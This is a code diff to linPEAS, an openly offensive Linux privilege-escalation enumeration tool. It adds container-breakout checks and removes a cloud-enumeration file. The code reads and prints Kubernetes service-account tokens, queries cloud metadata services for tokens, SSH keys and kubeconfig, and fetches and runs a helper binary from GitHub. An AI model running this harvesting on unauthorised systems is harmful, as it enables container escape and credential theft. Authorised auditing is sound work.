-    if [ -x "$(command -v fdisk)" ]; then
-        if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then
-            echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW},"
-        else
-            echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN},"
-        fi
-    else
-        echo_not_found
-    fi
-    echo ""
-
-    print_2title "Interesting Files Mounted"
-    (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g"
-    echo ""
-
-    print_2title "Possible Entrypoints"
-    ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/2_container/1_Container_tools.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/1_Container_tools.sh
@@ -0,0 +1,22 @@
+# Title: Container - Container Tools
+# ID: CT_Container_tools
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Find container related tools in the PATH of the system
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Container related tools present (if any):"
+command -v docker || echo -n ''
+command -v lxc || echo -n ''
+command -v rkt || echo -n ''
+command -v kubectl || echo -n ''
+command -v podman || echo -n ''
+command -v runc || echo -n ''
--- a/linPEAS/builder/linpeas_parts/2_container/2_List_mounted_tokens.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/2_List_mounted_tokens.sh
@@ -0,0 +1,32 @@
+# Title: Container - List mounted tokens
+# ID: CT_List_mounted_tokens
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: List tokens mounted in the system if any
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables: $ALREADY_TOKENS, $TEMP_TOKEN
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
+  print_2title "Listing mounted tokens"
+  print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
+  ALREADY_TOKENS="IinItialVaaluE"
+  for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
+      TEMP_TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
+      if ! [ $(echo $TEMP_TOKEN | grep -E $ALREADY_TOKENS) ]; then
+          ALREADY_TOKENS="$ALREADY_TOKENS|$TEMP_TOKEN"
+          echo "Directory: $i"
+          echo "Namespace: $(cat $i)"
+          echo ""
+          echo $TEMP_TOKEN
+          echo "================================================================================"
+          echo ""
+      fi
+  done
+fi
--- a/linPEAS/builder/linpeas_parts/2_container/3_Container_details.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/3_Container_details.sh
@@ -0,0 +1,40 @@
+# Title: Container - Container details
+# ID: CT_Container_details
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get container details
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: containerCheck, echo_no, print_2title, print_list
+# Global Variables: $containerType
+# Initial Functions: containerCheck
+# Generated Global Variables: $dockercontainers, $podmancontainers, $lxccontainers, $rktcontainers, $containerCounts
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Container details"
+print_list "Is this a container? ...........$NC $containerType"
+
+print_list "Any running containers? ........ "$NC
+# Get counts of running containers for each platform
+dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
+podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
+lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
+rktcontainers=$(rkt list 2>/dev/null | tail -n +2  | wc -l)
+if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
+    echo_no
+else
+    containerCounts=""
+    if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
+    if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
+    if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
+    if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
+    echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
+    
+    # List any running containers
+    if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
+    if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi
+    if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi
+    if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi
+fi
--- a/linPEAS/builder/linpeas_parts/2_container/4_Docker_container_details.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/4_Docker_container_details.sh
@@ -0,0 +1,37 @@
+# Title: Container - Docker Container details
+# ID: CT_Docker_container_details
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get docker Container details from the inside
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: checkDockerRootless, checkDockerVersionExploits, containerCheck, enumerateDockerSockets, inDockerGroup, print_2title, print_list
+# Global Variables: $containerType, $DOCKER_GROUP, $DOCKER_ROOTLESS, $dockerVersion, $inContainer, $VULN_CVE_2019_5736, $VULN_CVE_2019_13139, $VULN_CVE_2021_41091
+# Initial Functions: containerCheck
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+#If docker
+if echo "$containerType" | grep -qi "docker"; then
+    print_2title "Docker Container details"
+    inDockerGroup
+    print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "Looking and enumerating Docker Sockets (if any):\n"$NC
+    enumerateDockerSockets
+    print_list "Docker version .................$NC$dockerVersion"
+    checkDockerVersionExploits
+    print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "Vulnerable to CVE-2021-41091 ...$NC$VULN_CVE_2021_41091"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    if [ "$inContainer" ]; then
+        checkDockerRootless
+        print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
+        echo ""
+    fi
+    if df -h | grep docker; then
+        print_2title "Docker Overlays"
+        df -h | grep docker
+    fi
+fi
--- a/linPEAS/builder/linpeas_parts/2_container/5_Container_breakout.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/5_Container_breakout.sh
@@ -0,0 +1,134 @@
+# Title: Container - Container & breakout enumeration
+# ID: CT_Container_breakout
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Container breakout enumeration to see if in case we are inside a container we could escape
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: checkContainerExploits, checkProcSysBreakouts, containerCheck, echo_no, echo_not_found, print_2title, print_3title, print_info, print_list
+# Global Variables: $binfmt_misc_breakout, $containercapsB, $containerType, $core_pattern_breakout, $dev_mounted, $efi_efivars_writable, $efi_vars_writable, $GREP_IGNORE_MOUNTS, $inContainer, $kallsyms_readable, $kcore_readable, $kmem_readable, $kmem_writable, $kmsg_readable, $mem_readable, $mem_writable, $modprobe_present, $mountinfo_readable, $panic_on_oom_dos, $panic_sys_fs_dos, $proc_configgz_readable, $proc_mounted, $run_unshare, $release_agent_breakout1, $release_agent_breakout2, $release_agent_breakout3, $sched_debug_readable, $security_present, $security_writable, $sysreq_trigger_dos,  $uevent_helper_breakout, $vmcoreinfo_readable, $VULN_CVE_2019_5021, $self_mem_readable
+# Initial Functions: containerCheck
+# Generated Global Variables: $defautl_docker_caps
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$inContainer" ]; then
+    echo ""
+    print_2title "Container & breakout enumeration"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout"
+    print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')"
+    if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then
+        print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
+    fi
+    print_list "Seccomp enabled? ............... "$NC
+    ([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
+
+    print_list "AppArmor profile? .............. "$NC
+    (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
+
+    print_list "User proc namespace? ........... "$NC
+    if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
+
+    checkContainerExploits
+    print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+
+    print_3title "Breakout via mounts"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts"
+    
+    checkProcSysBreakouts
+    print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "Run unshare .................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "release_agent breakout 3........ $release_agent_breakout3\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
+    print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
+    print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+    if [ "$EXTRA_CHECKS" ]; then
+      print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/self/mem readable ........ $self_mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+      print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
+    fi
+    
+    echo ""
+    print_3title "Namespaces"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/namespaces"
+    ls -l /proc/self/ns/
+
+    if echo "$containerType" | grep -qi "kubernetes"; then
+        print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
+        print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
+        echo ""
+        
+        print_2title "Kubernetes Information"
+        print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
+        
+        
+        print_3title "Kubernetes service account folder"
+        ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
+        echo ""
+        
+        print_3title "Kubernetes env vars"
+        (env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
+        echo ""
+
+        print_3title "Current sa user k8s permissions"
+        print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/hardening-roles-clusterroles"
+        kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \
+          "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
+            -X 'POST' -H 'Content-Type: application/json' \
+            --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"
+
+    fi
+    echo ""
+
+    print_2title "Container Capabilities"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape"
+    if [ "$(command -v capsh || echo -n '')" ]; then 
+      capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
+    else
+      defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
+      cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
+      echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
+    fi
+    echo ""
+
+    print_2title "Privilege Mode"
+    if [ -x "$(command -v fdisk || echo -n '')" ]; then
+        if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then
+            echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW},"
+        else
+            echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN},"
+        fi
+    else
+        echo_not_found
+    fi
+    echo ""
+
+    print_2title "Interesting Files Mounted"
+    (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g"
+    echo ""
+
+    print_2title "Possible Entrypoints"
+    ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/2_container/6_Am_I_contained.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/6_Am_I_contained.sh
@@ -0,0 +1,20 @@
+# Title: Container - Am I Containered 
+# ID: CT_Am_I_contained
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Am I Containered tool
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, execBin
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables: $FAT_LINPEAS_AMICONTAINED
+# Fat linpeas: 1
+# Small linpeas: 0
+
+
+if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then
+  print_2title "Am I Containered?"
+  FAT_LINPEAS_AMICONTAINED="peass{https://github.com/genuinetools/amicontained/releases/latest/download/amicontained-linux-amd64}"
+  execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud.sh
@@ -1,504 +0,0 @@
-###########################################
-#-----------) Cloud functions (-----------#
-###########################################
-
-GCP_GOOD_SCOPES="/devstorage.read_only|/logging.write|/monitoring|/servicecontrol|/service.management.readonly|/trace.append"
-GCP_BAD_SCOPES="/cloud-platform|/compute"
-
-exec_with_jq(){
-  if [ "$(command -v jq)" ]; then 
-    $@ | jq 2>/dev/null;
-    if ! [ $? -eq 0 ]; then
-      $@;
-    fi
-   else 
-    $@;
-   fi
-}
-
-check_gcp(){
-  is_gcp="No"
-  if grep -q metadata.google.internal /etc/hosts 2>/dev/null || (curl --connect-timeout 2 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]); then
-    is_gcp="Yes"
-  fi
-}
-
-check_do(){
-  is_do="No"
-  if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then
-    is_do="Yes"
-  fi
-}
-
-check_ibm_vm(){
-  is_ibm_vm="No"
-  if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then
-    curl --connect-timeout 2  "http://169.254.169.254" > /dev/null 2>&1 || wget --timeout 2 --tries 1  "http://169.254.169.254" > /dev/null 2>&1
-    if [ "$?" -eq 0 ]; then
-      IBM_TOKEN=$( ( curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H "Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"' -f4 ) || ( wget --tries 1 -O - --method PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header "Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d '"' -f4 ) )
-      is_ibm_vm="Yes"
-    fi
-  fi
-}
-
-check_aws_ecs(){
-  is_aws_ecs="No"
-  if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then
-    is_aws_ecs="Yes";
-    aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI_v4;
-    aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
-  
-  elif (env | grep -q ECS_CONTAINER_METADATA_URI); then
-    is_aws_ecs="Yes";
-    aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI;
-    aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
-  
-  elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then
-    is_aws_ecs="Yes";
-  fi
-  
-  if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then
-    aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
-  fi
-}
-
-check_aws_ec2(){
-  is_aws_ec2="No"
-  is_aws_ec2_beanstalk="No"
-
-  if [ -d "/var/log/amazon/" ]; then
-    is_aws_ec2="Yes"
-    EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
-
-  else
-    EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
-    if [ "$(echo $EC2_TOKEN | cut -c1-2)" = "AQ" ]; then
-      is_aws_ec2="Yes"
-    fi
-  fi
-  
-  if [ "$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then
-    is_aws_ec2_beanstalk="Yes"
-  fi
-}
-
-check_aws_lambda(){
-  is_aws_lambda="No"
-
-  if (env | grep -q AWS_LAMBDA_); then
-    is_aws_lambda="Yes"
-  fi
-}
-
-check_aws_codebuild(){
-  is_aws_codebuild="No"
-
-  if [ -f "/codebuild/output/tmp/env.sh" ] && grep -q "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" "/codebuild/output/tmp/env.sh" ; then
-    is_aws_codebuild="Yes"
-  fi
-}
-
-check_az_vm(){
-  is_az_vm="No"
-
-  if [ -d "/var/log/azure/" ]; then
-    is_az_vm="Yes"
-  
-  elif cat /etc/resolv.conf 2>/dev/null | grep -q "search reddog.microsoft.com"; then
-    is_az_vm="Yes"
-  fi
-}
-
-check_az_app(){
-  is_az_app="No"
-
-  if [ -d "/opt/microsoft" ] && env | grep -q "IDENTITY_ENDPOINT"; then
-    is_az_app="Yes"
-  fi
-}
-
-
-check_gcp
-print_list "Google Cloud Platform? ............... $is_gcp\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-check_aws_ecs
-print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-check_aws_ec2
-print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-check_aws_lambda
-print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-check_aws_codebuild
-print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-check_do
-print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-check_ibm_vm
-print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-check_az_vm
-print_list "Azure VM? ............................ $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-check_az_app
-print_list "Azure APP? ........................... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
-
-echo ""
-
-if [ "$is_gcp" = "Yes" ]; then
-    gcp_req=""
-    if [ "$(command -v curl)" ]; then
-        gcp_req='curl -s -f  -H "X-Google-Metadata-Request: True"'
-    elif [ "$(command -v wget)" ]; then
-        gcp_req='wget -q -O - --header "X-Google-Metadata-Request: True"'
-    else 
-        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
-    fi
-
-
-    if [ "$gcp_req" ]; then
-        print_2title "Google CLoud Platform Enumeration"
-        print_info "https://book.hacktricks.xyz/cloud-security/gcp-security"
-
-        ## GC Project Info
-        p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
-        [ "$p_id" ] && echo "Project-ID: $p_id"
-        p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
-        [ "$p_num" ] && echo "Project Number: $p_num"
-        pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
-        [ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k"
-        p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
-        [ "$p_attrs" ] && echo "All Project Attributes: $p_attrs"
-
-        # OSLogin Info
-        osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users)
-        [ "$osl_u" ] && echo "OSLogin users: $osl_u"
-        osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups)
-        [ "$osl_g" ] && echo "OSLogin Groups: $osl_g"
-        osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys)
-        [ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk"
-        osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize)
-        [ "$osl_au" ] && echo "OSLogin Authorize: $osl_au"
-
-        # Instance Info
-        inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description)
-        [ "$inst_d" ] && echo "Instance Description: "
-        inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname)
-        [ "$inst_hostn" ] && echo "Hostname: $inst_hostn"
-        inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
-        [ "$inst_id" ] && echo "Instance ID: $inst_id"
-        inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image)
-        [ "$inst_img" ] && echo "Instance Image: $inst_img"
-        inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type)
-        [ "$inst_mt" ] && echo "Machine Type: $inst_mt"
-        inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name)
-        [ "$inst_n" ] && echo "Instance Name: $inst_n"
-        inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags)
-        [ "$inst_tag" ] && echo "Instance tags: $inst_tag"
-        inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
-        [ "$inst_zone" ] && echo "Zone: $inst_zone"
-
-        inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
-        [ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
-        inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
-        [ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
-        inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
-        [ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
-        inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
-        [ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
-        inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
-        [ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
-        inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
-        [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv"
-
-        echo ""
